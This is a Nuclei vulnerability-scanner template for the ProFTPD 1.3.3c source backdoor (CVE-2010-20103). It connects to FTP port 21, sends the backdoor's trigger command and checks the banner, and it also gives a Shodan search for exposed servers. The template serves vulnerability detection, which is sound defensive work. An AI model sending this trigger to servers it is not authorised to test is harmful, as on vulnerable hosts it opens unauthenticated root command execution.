Files
nuclei-templates/javascript/cves/2010/CVE-2010-20103.yaml

48 lines
1.6 KiB
YAML

id: CVE-2010-20103
info:
name: ProFTPd-1.3.3c - Backdoor Command Execution
author: pussycat0x
severity: critical
description: |
ProFTPD 1.3.3c contains a command injection backdoor caused by a hidden FTP command trigger in the source tarball, letting remote unauthenticated attackers execute arbitrary shell commands with root privileges.
remediation: |
Update to a version later than 1.3.3c or the latest available version.
reference:
- https://github.com/shafdo/ProFTPD-1.3.3c-Backdoor_Command_Execution_Automated_Script/blob/main/README.md
- https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor/
- https://www.exploit-db.com/exploits/15662
metadata:
max-request: 1
shodan-query: product:\"ProFTPD\"
tags: cve,cve2010,js,network,proftpd,ftp,backdoor,vkev,passive,vuln
javascript:
- pre-condition: |
isPortOpen(Host,Port);
code: |
const data = "HELP ACIDBITCHEZ\r\n";
const c = require("nuclei/net");
let conn = c.Open('tcp', `${Host}:${Port}`);
conn.Send(data);
let resp = conn.RecvString();
Export(resp);
args:
Host: "{{Host}}"
Port: 21
matchers-condition: and
matchers:
- type: dsl
dsl:
- "success == true"
- "contains(response, '220 ProFTPD 1.3.3c')"
condition: and
- type: word
words:
- "contains(response, '502 Unknown command')"
negative: true
# digest: 490a00463044022029f3f4a272a5ef42ae840c7add3acb45eb0399e7a102fd22d1812865830524360220345fa80c86e1f6011403505cff1a598c49b9651319fa81149d61bb32e96b0344:922c64590222798bb761d5b6d8e72950